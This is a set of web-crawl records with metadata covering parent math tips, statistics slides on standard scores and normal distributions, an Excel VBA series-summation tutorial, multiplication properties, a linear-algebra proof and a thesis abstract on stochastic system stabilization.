look for it. It doesn’t have to be just computations but rather looking at relationships, patterns and sizes. Problem solving, deciding between choices are also mathematical processes, as are playing games and solving logic puzzles.\n\nFor younger students: grouping and organizing toys, practicing adding and subtracting using toys, blocks, etc. and looking for and making patterns. Comparing more than and less than and by how much. For example: a child has 4 dolls and 12 stuffed animals, you could ask, “how many more stuffed animals than dolls do you have and how do you know?”\n\nRead books that involve math or find the math in nighttime stories. Encourage creativity and ask your child to find the math (shapes, counting, comparing, categorizing, estimating, etc.) in stories, shows, movies etc. This helps develop mathematical habits of mind.\n\nWe know you want to support your children as best as you can. That can be tough in an age where there is almost too much information and conflicting information! This is particularly true with our new math curriculum.\n\nThis page is here to help provide you with some information about our math curriculum. It also provides you with some activities you can do at home, and links to other great websites that can help you support your child best. Math can be fun, easy and challenging – but in a good way. It is all about how we approach it.\n\n## Minimize Math Anxiety\n\nFor many of us math was no fun in school. It was difficult and often a complete mystery. It is easy to think that math is ‘hard’ because of our experiences with it. But for many of us, that is because of how it was taught. Our new methods overcome that. 
Avoid endorsing math anxiety or being “bad at math”. Students who have these attitudes towards math have more difficulties learning math than those who approach it positively.\n\n## Encourage a Growth Mindset\n\nWe all have either a “growth mindset” or “fixed mindset” when it comes to math. These mindsets have been proven to really affect learning.To develop a Growth Mindset encourage your child to persevere through frustration and understand that mistakes are a really important part of the learning process – so are not bad but rather are very useful when we reflect on them and understand what type of mistake it was (carless mistake, misunderstanding, etc.). Also we need to remember that learning is challenging and when things get difficult that doesn’t mean there is anything wrong but rather it is a part of learning! New concepts are often difficult at first, while we are trying to connect them to what we already know and make sense of them, and then with time and practice, they are not so difficult anymore. Embrace the struggle – without great struggle there is no great learning!\n\n## Helping with Homework:\n\nMany parents don’t understand why we use multiple strategies to solve the problem when only one strategy is needed. We are teaching students WHY the math works when we use different strategies so even though you may think that the strategies are inefficient there is a very important purpose to using them. Some strategies are inefficient but are an important stepping stone towards deeper understanding. Imagine an Olympic diver attempting a complex dive off of a high board without first practicing multiple small steps in a foam pit or supported trampoline. It is the same learning approach.\n\nWe use manipulatives (blocks, tiles, fraction circles) and pictures to help students make sense of what the math actually means. For example 4 x 3 means 4 groups of 3, or 4 rows of 3. Most humans gather 70%-90% of their information visually, so we are making math more visual to help more people understand it. We also use these visuals to help us find the generalizations in math that become those ‘rules’ you might have memorized. This way students actually understand why the rules work as they do and they often construct the rules themselves which means they are way more likely to remember them!\n\nIt is great role modeling for your children to see you as a lifelong learner who is open minded to trying new things. We encourage you to try to understand these different methods and visuals as this can help improve your number sense too!\n\nIf you are really stuck and can’t help your child with their homework, please send along a note to the teacher explaining so. This is more helpful than teaching them a shortcut or the traditional algorithm before they have enough deeper understanding to actually understand the algorithm or short cut. If they can’t explain why something works, then they don’t have the understanding we’re aiming for.\n\n## Involve your child in “real-life” math (adjust for the child’s age)\n\n### Grocery shopping:\n\n1. Practice rounding items to the nearest dollar or dime (example: if a jar of peanut butter is \\$4.69 – is this closer to \\$4 or \\$5? How do you know?)\n2. Estimate the value of each item and create a total estimate. This can be a game to see how close you come to the real value.\n3. Compare prices to see which is the better deal. This can be done using estimation or using the unit prices listed on most prices.\n4. 
If you buy enough groceries to last 4 or 5 days, estimate the cost per day\n5. Determine how much you save if you buy things on sale.\n\n### Cooking/Baking:\n\n1. Just using measuring spoons and cups and reading recipes helps!\n2. When doubling or halving recipes, determine how much of each ingredient is needed.\n3. Looking at the measurements on measuring spoons and cups, determine how many teaspoons in a tablespoon, how many tablespoons in a ¼ cup, etc.\n4. Ask them to do the measuring and show when you estimate (1/2 teaspoon in your palm etc).\n\n### In the kitchen:\n\n1. What holds more – juice container or milk container? How do you know? How much more?\n2. Find containers that have similar volumes but different shapes (like a tall skinny container compared to a short fat container). Ask them to determine by looking which has more, then read the volumes\n3. Estimate weights of ingredients (a potato, carrots, etc) and then weigh them on a scale to see how close you came.\n4. Chop vegetables into fractions! If I chop a celery stalk into 4 pieces, what fraction of the stalk is each piece?\n\n### In the car: (keep in mind that the working memory is not fully developed so don’t surpass 2-digit numbers unless your child can work with larger numbers mentally)\n\n1. Make 20 – they can make 20 by adding, subtracting, multiplying, dividing, or a combination. This can be done with any number and the more ways a child can find the better! For K – make 5, for Gr. 1/2 – make 10, for Gr. 3/4 – Make 20, 25, 30,etc. for Gr. 5- up to make 100\n2. Estimate how far 1 km is (use your odometer). Estimate 2 km. Use Siri to get directions and then make a game out of when to turn (she’ll say “turn left in 500m”). It helps students to know how far 500 m or 200 m is.\n3. Ask your child an addition (subtraction, multiplication, division) question and then ask them HOW they got it. For example: 15 + 7 (they might say 10 +5+7 = 10+12 =22).\n4. Ask your child to create a story problem or real-life problem to match a question. For example: 3 x 4 à A story problem that might work. I have 3 friends over and I give each friend 4 candies from my Halloween stash, how many candies did I give away?\n5. Give a question and ask your child to estimate only and then see who is closest (you can play too). For example: 43 x 37 (estimate 40 x 40 = 1600)." ]
[ null, "https://educatingnow.com/wp-content/uploads/2020/02/kids-300x149.png", null, "https://educatingnow.com/wp-content/uploads/2018/04/Parents-How-to-Help-Your-Children-to-Learn-Enjoy-Math-Part-10.png", null, "https://educatingnow.com/wp-content/uploads/2018/06/fraction-war-300x216.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93505603,"math_prob":0.9571624,"size":8996,"snap":"2022-27-2022-33","text_gpt3_token_len":2277,"char_repetition_ratio":0.1116548,"word_repetition_ratio":0.07542579,"special_character_ratio":0.26789683,"punctuation_ratio":0.10086768,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98635876,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-18T16:24:59Z\",\"WARC-Record-ID\":\"<urn:uuid:e0066002-d0ee-4a02-a45b-de04934830da>\",\"Content-Length\":\"136107\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:58910c5a-4162-4c6d-87e0-857916176b11>\",\"WARC-Concurrent-To\":\"<urn:uuid:e6bd1a1a-3b65-4e48-8b53-ffe99cec9ac7>\",\"WARC-IP-Address\":\"172.67.184.34\",\"WARC-Target-URI\":\"https://educatingnow.com/parents/\",\"WARC-Payload-Digest\":\"sha1:5JTFDGE6F2ATBOEL2JL6CSTGJH373QZH\",\"WARC-Block-Digest\":\"sha1:EZRFNDFEIDI6L72KXKNW33SL2A7JOXFZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573242.55_warc_CC-MAIN-20220818154820-20220818184820-00190.warc.gz\"}"}
https://studyres.com/doc/4238907/?page=27
[ "Survey\n\n* Your assessment is very important for improving the work of artificial intelligence, which forms the content of this project\n\nDocument related concepts\nno text concepts found\nTranscript\n```HKDSE Mathematics\nRonald Hui\nTak Sun Secondary School\nHomework\nSHW6-C1: Sam L\nSHW7-B1: Sam L\nSHW7-P1: Sam L\nSHW8-A1: Sam L\nSHW8-P1: Kelvin\nRE8: Sam L\nRonald HUI\nBook 5B Chapter 9\nApplications of Standard Deviation\nAngel’s\nmark\nMean mark of\nher class\nDifference\nChinese\n65\n62\n65 – 62 = 3\nEnglish\n72\n68\n72 – 68 = 4\nTest\nSince the difference between my mark\nand mean mark of the class is higher\nin English test, I perform better in\nEnglish test.\nConsider the following histograms which show the\ndistributions of marks of the class in the two subjects.\nAngel’s marks are indicated in the distribution by the\nyellow line.\nLet us look into the test\nresults in more details.\nIn which test, there are less students\nwhose marks are higher than Angel?\nAmong the two tests, there are less\nstudents have marks higher than\nAngel in Chinese test.\nFrom the above histograms, although the difference\nbetween Angel’s mark and the mean mark in English\ntest is higher than that in Chinese test, her performance\nis better in Chinese test when compared with other\nstudents in her class.\nFrom the above example, we can\nsee that Angel’s performance in different\ntests not only depends on the actual\nmarks or difference from the mean mark,\nbut also depends on the dispersion\nof the marks in the class.\nIn statistics, we use a measure called\nthe standard score to compare data\nfrom different data sets.\nStandard Score\nFor a set of data with mean x and standard\ndeviation , the standard score z of a given\ndatum x is defined as\nstandard score z \nxx\n\n◄ Standard score\nhas\nno unit.\nThe standard score measures how\nfar away a datum lies from the mean\nin units of the standard deviation.\nStandard Score\nFor a set of data with mean x and standard\ndeviation , the standard score z of a given\ndatum x is defined as\nstandard score z \nxx\n\n◄ Standard score\nhas\nno unit.\nIt is positive when the datum is\nabove mean and negative when\nthe datum is below mean.\nFor Chinese test,\nAngel’s mark (xC) = 65\nClass’ mean mark (xC) = 62\nStandard deviation (C) = 3\nFor English test,\nAngel’s mark (xE) = 72\nClass’ mean mark (xE) = 68\nStandard deviation (E) = 8\nStandard score (zC)\nStandard score (zE)\nxC  x C\n65  62\nzC \n\nC\n3\n 1  This means that Angel’s\n∵\n∴\nmark in Chinese is 1\nstandard deviation above\nthe mean.\n72  68\nxE  x E\n\nzE \n8\nE\n 0.5  This means that Angel’s\nmark in English is 0.5\nstandard deviation above\nthe mean.\nz C > zE\nAngel performs better in Chinese test.\nFollow-up question\nRefer to the following table.\nTest 1\nTimmy’s\nmark\n65\nTest 2\n72\nMean of Standard deviation\nthe class\nof the class\n68\n6\n74\n8\n(a) Find the standard scores of Timmy in the two tests.\n(b) In which test does Timmy perform better? Briefly\n65  68\nz\n\n 0.5\n(a) For test 1, 1\n6\n72  74\n 0.25\nFor test 2, z2 \n8\nFollow-up question\nRefer to the following table.\nTest 1\nTimmy’s\nmark\n65\nTest 2\n72\nMean of Standard deviation\nthe class\nof the class\n68\n6\n74\n8\n(a) Find the standard scores of Timmy in the two tests.\n(b) In which test does Timmy perform better? Briefly\n(b) ∵ z2 > z1\n∴ Timmy performs better in test 2.\nNormal Distribution\nThe article says many data\ndistribution. 
What is a\nnormal distribution?\nNormal distribution is one of\nthe most common and important\ndistributions in statistics. Many kinds of\nphysical and biological measurements\nsuch as heights, weights and Body\nMass Indexes (BMI) of the population\nThe frequency curve of a normal distribution is\nrepresented by a normal curve.\nNormal\ncurve\n\nThe normal curve gets closer and closer to the horizontal\naxis in both directions, but never touches it.\nThe mean x and the standard deviation  of a\ndistribution determine the location and the shape of\nits normal curve.\nThe characteristics of a normal curve include:\nNormal\ncurve\nreflectional symmetry\nbell-shaped\nmean, median and\nmode all equal to x\nIf a set of data follows the normal distribution, it has the\nfollowing properties.\n1. The curve is symmetrical about the mean x. So, there\nare 50% data above x , and 50% data below x.\n2. About 68% of the data lie within one standard deviation\nfrom the mean, i.e. the interval between x   and\nx  .\n3. About 95% of the data lie within two standard deviations\nfrom the mean, i.e. the interval between x  2 and\nx  2 .\n4. About 99.7% of the data lie within three standard\ndeviations from the mean, i.e. the interval between\nx  3 and x  3 .\nTo summarize, we can estimate the percentage of data falling\nbetween one, two and three standard deviations about the\nmean by the following diagram.\nFollow-up question\nIn each of the following normal curves,\n(i) shade the region(s) indicating the data lying in the\nspecified interval,\n(ii) find the percentage of data lying in the specified interval.\nInterval\n(a)\nNormal Curve\nPercentage of data\nbetween\nx \nand\nx\n34%\nFollow-up question\nIn each of the following normal curves,\n(i) shade the region(s) indicating the data lying in the\nspecified interval,\n(ii) find the percentage of data lying in the specified interval.\nInterval\n(b)\nNormal Curve\nPercentage of data\nbetween\nx  2\nand\nx  3\n97.35%\nFollow-up question\nIn each of the following normal curves,\n(i) shade the region(s) indicating the data lying in the\nspecified interval,\n(ii) find the percentage of data lying in the specified interval.\nInterval\n(c)\nSmaller\nthan\nx  2\nNormal Curve\nPercentage of data\n97.5%\nExample:\nThe heights of 100 students are normally distributed with\na mean of 155 cm and a standard deviation of 8 cm.\nHow many students have heights between 147 cm\nand 163 cm?\nNormally distributed\n∵ 147 cm = (155 – 8) cm = x – \n163 cm = (155 + 8) cm = x + \n∴ The required number of students\n\n= 100  68%\n= 68\nmeans the data set\nfollows normal\ndistribution.\nFollow-up question\nThe weights of 100 students in a school are normally\ndistributed with a mean of 48 kg and a standard deviation\nof 10 kg. Find\n(a) the percentage,\n(b) the number\nof students who are over 58 kg.\n(a) ∵ 58 kg = (48 + 10) kg = x + \n∴ The required percentage\n\n= (50  34)%\n= 16 %\n34\nFollow-up question\nThe weights of 100 students in a school are normally\ndistributed with a mean of 48 kg and a standard deviation\nof 10 kg. Find\n(a) the percentage,\n(b) the number\nof students who are over 58 kg.\n(b) The required number of students\n= 100  16%\n= 16\n```\nRelated documents" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8929465,"math_prob":0.9285576,"size":6525,"snap":"2020-34-2020-40","text_gpt3_token_len":1590,"char_repetition_ratio":0.15488422,"word_repetition_ratio":0.32587063,"special_character_ratio":0.25578544,"punctuation_ratio":0.083524905,"nsfw_num_words":2,"has_unicode_error":false,"math_prob_llama3":0.99628955,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-30T09:46:36Z\",\"WARC-Record-ID\":\"<urn:uuid:de71a1e5-4423-4796-931f-8b0f8553159f>\",\"Content-Length\":\"52495\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7046b5c4-3884-4d8e-8653-9dbba54bbca6>\",\"WARC-Concurrent-To\":\"<urn:uuid:b1d7f82e-2968-466c-88d0-365798ddbe5d>\",\"WARC-IP-Address\":\"172.67.151.140\",\"WARC-Target-URI\":\"https://studyres.com/doc/4238907/?page=27\",\"WARC-Payload-Digest\":\"sha1:L5DA5HITSIOMWNBUYORNS2FDUXKMF5IM\",\"WARC-Block-Digest\":\"sha1:C7BTKEU3ZHVRJSMW362LF6A75PXKJ4UV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600402123173.74_warc_CC-MAIN-20200930075754-20200930105754-00466.warc.gz\"}"}
https://www.excel-easy.com/vba/examples/complex-calculations.html
[ "# Complex Calculations\n\nThe kth term, Tk, of a certain mathematical series is defined by the following formula:\n\n Tk = k2 + 6k + 1 9k + 7\n\nThe first term, T1, of the series is obtained by substituting k = 1 into the formula i.e.\n\n T1 = 12 + 6 + 1 = 1 and 9 + 7 2\n T2 = 22 + 12 + 1 = 17 ... and so on 18 + 7 25\n\nBelow we will look at a program in Excel VBA that calculates any term Tk and summation of terms up to N.", null, "Explanation: the user has the option to enter \"All\" or \"Odd\", to respectively calculate the sum of the first N terms of the series or the sum of only the odd terms up to N.\n\nPlace a command button on your worksheet and add the following code lines:\n\n1. First, we declare four variables of type Integer and one variable of type String.\n\nDim i, term, N, stepSize As Integer\nDim sumType As String\n\n2. Second, we initialize the variables.\n\ni = 0\nN = Range(\"C2\").Value\nsumType = Range(\"C3\").Value\n\n3. Empty the fields.\n\nRange(\"A8:B1000\").Value = \"\"\nRange(\"C6\").Value = \"\"\n\n4. Determine stepSize.\n\nSelect Case sumType\nCase Is = \"All\"\nstepSize = 1\nCase Is = \"Odd\"\nstepSize = 2\nCase Else\nMsgBox \"Enter a valid expression in cell C3\"\nEnd\nEnd Select\n\n5. Do the calculations.\n\nFor term = 1 To N Step stepSize\nCells(8 + i, 1).Value = term\nCells(8 + i, 2).Value = (term ^ 2 + (6 * term) + 1) / ((9 * term) + 7)\n\nRange(\"C6\").Value = Range(\"C6\").Value + Cells(8 + i, 2).Value\n\ni = i + 1\nNext term\n\nExplanation: we use the Step keyword to specify the increment (1 for \"All\" and 2 for \"Odd\") for the counter variable of the loop.\n\nResult:", null, "Go to Next Chapter: Macro Errors" ]
[ null, "https://www.excel-easy.com/vba/examples/images/complex-calculations/complex-calculations-example.png", null, "https://www.excel-easy.com/vba/examples/images/complex-calculations/complex-calculations-result.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74138963,"math_prob":0.998312,"size":1496,"snap":"2019-51-2020-05","text_gpt3_token_len":460,"char_repetition_ratio":0.11863271,"word_repetition_ratio":0.0,"special_character_ratio":0.33890375,"punctuation_ratio":0.13479623,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99975175,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-29T07:27:32Z\",\"WARC-Record-ID\":\"<urn:uuid:7fc8d153-639f-4821-af35-0901ad3a2627>\",\"Content-Length\":\"16845\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:aeb8cb35-47c2-49d5-8550-fa8ee9594563>\",\"WARC-Concurrent-To\":\"<urn:uuid:78df4151-0816-4749-8a7d-a50b2010af01>\",\"WARC-IP-Address\":\"185.87.187.11\",\"WARC-Target-URI\":\"https://www.excel-easy.com/vba/examples/complex-calculations.html\",\"WARC-Payload-Digest\":\"sha1:HXPNAITPEVU6WERGDJE4BIWAC5YP4EBA\",\"WARC-Block-Digest\":\"sha1:L7FSKSVGQFUAJ4MMKFLEQLEFXI5LWLWG\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251789055.93_warc_CC-MAIN-20200129071944-20200129101944-00211.warc.gz\"}"}
http://www.aaamath.com/B/mul74bx2.htm
[ "Multiplication Properties There are four properties involving multiplication that will help make problems easier to solve. They are the commutative, associative, multiplicative identity and distributive properties. Commutative property: When two numbers are multiplied together, the product is the same regardless of the order of the multiplicands. For example 4 * 2 = 2 * 4 Associative Property: When three or more numbers are multiplied, the product is the same regardless of the grouping of the factors. For example (2 * 3) * 4 = 2 * (3 * 4) Multiplicative Identity Property: The product of any number and one is that number. For example 5 * 1 = 5. Distributive property: The sum of two numbers times a third number is equal to the sum of each addend times the third number. For example 4 * (6 + 3) = 4*6 + 4*3 Return to Top" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83544016,"math_prob":0.9939406,"size":787,"snap":"2021-43-2021-49","text_gpt3_token_len":202,"char_repetition_ratio":0.15581098,"word_repetition_ratio":0.05839416,"special_character_ratio":0.25031766,"punctuation_ratio":0.104166664,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9978476,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T16:34:29Z\",\"WARC-Record-ID\":\"<urn:uuid:113a0d47-b36f-408d-98e8-c4c5f8df67cf>\",\"Content-Length\":\"7363\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:caf48d05-82a4-45ab-a0a3-d0a1cfdd3373>\",\"WARC-Concurrent-To\":\"<urn:uuid:0750c029-ac6c-4dfc-a2ef-0a7825f2bb39>\",\"WARC-IP-Address\":\"216.37.42.100\",\"WARC-Target-URI\":\"http://www.aaamath.com/B/mul74bx2.htm\",\"WARC-Payload-Digest\":\"sha1:ALXGORKSD34WR3TPIUUF2F532BJD63DE\",\"WARC-Block-Digest\":\"sha1:5JRLVOGMVU5LSK3DDGTBB22XHU2OOIMR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588216.48_warc_CC-MAIN-20211027150823-20211027180823-00582.warc.gz\"}"}
https://www.studysmarter.us/textbooks/math/linear-algebra-and-its-applications-5th/linear-equations-in-linear-algebra/q39q-let-tmathbbrn-to-mathbbrn-be-an-invertible-linear-trans/
[ "", null, "Suggested languages for you:\n\nEurope\n\nAnswers without the blur. Sign up and see all textbooks for free!", null, "Q39Q\n\nExpert-verified", null, "Found in: Page 1", null, "### Linear Algebra and its Applications\n\nBook edition 5th\nAuthor(s) David C. Lay, Steven R. Lay and Judi J. McDonald\nPages 483 pages\nISBN 978-03219822384", null, "# Let $$T:{\\mathbb{R}^n} \\to {\\mathbb{R}^n}$$ be an invertible linear transformation, and let S and U be functions from $${\\mathbb{R}^n}$$ into $${\\mathbb{R}^n}$$ such that $$S\\left( {T\\left( {\\mathop{\\rm x}\\nolimits} \\right)} \\right) = {\\mathop{\\rm x}\\nolimits}$$ and $$U\\left( {T\\left( {\\mathop{\\rm x}\\nolimits} \\right)} \\right) = {\\mathop{\\rm x}\\nolimits}$$ for all x in $${\\mathbb{R}^n}$$. Show that $$U\\left( v \\right) = S\\left( v \\right)$$ for all v in $${\\mathbb{R}^n}$$. This will show that T has a unique inverse, as asserted in theorem 9. (Hint: Given any v in $${\\mathbb{R}^n}$$, we can write $${\\mathop{\\rm v}\\nolimits} = T\\left( {\\mathop{\\rm x}\\nolimits} \\right)$$ for some x. Why? Compute $$S\\left( {\\mathop{\\rm v}\\nolimits} \\right)$$ and $$U\\left( {\\mathop{\\rm v}\\nolimits} \\right)$$).\n\nIt is proved that $$U\\left( v \\right) = S\\left( v \\right)$$.\n\nSee the step by step solution\n\n## Step 1: Show that T is onto mapping\n\nFor any v in $${\\mathbb{R}^n}$$, you can write $${\\mathop{\\rm v}\\nolimits} = T\\left( x \\right)$$ for some x (since $$T$$ is onto mapping).\n\n## Step 2: Show that $$U\\left( v \\right) = S\\left( v \\right)$$ for all v in $${\\mathbb{R}^n}$$\n\nAccording to the assumed properties of S and U, $$S\\left( v \\right) = S\\left( {T\\left( x \\right)} \\right) = x$$ and $$U\\left( v \\right) = U\\left( {T\\left( x \\right)} \\right) = x$$. Therefore, $$S\\left( v \\right)$$ and $$U\\left( v \\right)$$ are equal for any v.\n\nThis means that S and U are the same functions from $${\\mathbb{R}^n}$$ into $${\\mathbb{R}^n}$$.\n\nThus, it is proved that $$U\\left( v \\right) = S\\left( v \\right)$$.", null, "### Want to see more solutions like these?", null, "" ]
[ null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/dist/assets/images/header-logo.svg", null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/src/assets/images/ab-test/searching-looking.svg", null, "https://studysmarter-mediafiles.s3.amazonaws.com/media/textbook-images/Linear_Algebra.png", null, "https://studysmarter-mediafiles.s3.amazonaws.com/media/textbook-images/Linear_Algebra.png", null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/src/assets/images/ab-test/businessman-superhero.svg", null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/img/textbook/banner-top.svg", null, "https://www.studysmarter.us/wp-content/themes/StudySmarter-Theme/img/textbook/cta-icon.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6779361,"math_prob":1.0000063,"size":1829,"snap":"2023-14-2023-23","text_gpt3_token_len":696,"char_repetition_ratio":0.21917808,"word_repetition_ratio":0.11567164,"special_character_ratio":0.38545653,"punctuation_ratio":0.08791209,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000079,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-29T16:43:59Z\",\"WARC-Record-ID\":\"<urn:uuid:aa8348dc-6440-4310-8a20-62a4f7cf7ce7>\",\"Content-Length\":\"156896\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71e23b6b-1398-40e6-95d2-41160e3532f6>\",\"WARC-Concurrent-To\":\"<urn:uuid:308ce05f-bdc6-4ed6-b1af-c1c78daa89a3>\",\"WARC-IP-Address\":\"18.194.226.228\",\"WARC-Target-URI\":\"https://www.studysmarter.us/textbooks/math/linear-algebra-and-its-applications-5th/linear-equations-in-linear-algebra/q39q-let-tmathbbrn-to-mathbbrn-be-an-invertible-linear-trans/\",\"WARC-Payload-Digest\":\"sha1:H6TQJM65Y3VRIV7KOZALMUMQNOMIQZUZ\",\"WARC-Block-Digest\":\"sha1:7FW2FAS4KTF6UNZVMEPKYV6B7QZPCPRD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949009.11_warc_CC-MAIN-20230329151629-20230329181629-00642.warc.gz\"}"}
https://digitalscholarship.tnstate.edu/dissertations/AAI1497845/
[ "# Robust Stability and Stabilization of a Class of Non-Linear Discrete-Time Stochastic Systems\n\n#### Abstract\n\nA problem of robust state feedback stability and stabilization of nonlinear discrete-time stochastic processes is considered. The linear rate vector of a discrete-time system is perturbed by a nonlinear function that satisfies a quadratic constraint. Our objective is to show how linear constant feedback laws can be formulated to stabilize this type of nonlinear discrete-time systems and, at the same time maximize the bounds on this nonlinear perturbing function which the system can tolerate without becoming unstable. The state dependent diffusion is modeled by a normal sequence of identically independently distributed random variables. The new formulation provides a suitable setting for robust stabilization of nonlinear discrete-time systems where the underlying deterministic system satisfy the generalized matching conditions. Our method which is based on linear matrix inequalities (LMIs) is distinctive from the existing robust control and absolute stability techniques. Examples are given to demonstrate the obtained results.\n\n#### Subject Area\n\nMathematics|Electrical engineering\n\n#### Recommended Citation\n\nAndre' J Strong, \"Robust Stability and Stabilization of a Class of Non-Linear Discrete-Time Stochastic Systems\" (2011). ETD Collection for Tennessee State University. Paper AAI1497845.\nhttps://digitalscholarship.tnstate.edu/dissertations/AAI1497845\n\nCOinS" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8569183,"math_prob":0.851535,"size":1460,"snap":"2019-35-2019-39","text_gpt3_token_len":268,"char_repetition_ratio":0.12843406,"word_repetition_ratio":0.06451613,"special_character_ratio":0.16575342,"punctuation_ratio":0.06849315,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97360474,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-17T05:03:22Z\",\"WARC-Record-ID\":\"<urn:uuid:782d5c90-672f-46e7-9c67-aacf146d54d5>\",\"Content-Length\":\"29706\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c908fff-3491-40f3-9279-526d1fab9c50>\",\"WARC-Concurrent-To\":\"<urn:uuid:f6054242-1bfd-470c-8171-17b8a654afc3>\",\"WARC-IP-Address\":\"72.5.9.223\",\"WARC-Target-URI\":\"https://digitalscholarship.tnstate.edu/dissertations/AAI1497845/\",\"WARC-Payload-Digest\":\"sha1:K5FHQBK3YH7IANWWARQKZZZBIDOBLSIH\",\"WARC-Block-Digest\":\"sha1:2N2ITKB5REV3UW62LVBZ7PSYG2W5GXKN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573052.26_warc_CC-MAIN-20190917040727-20190917062727-00125.warc.gz\"}"}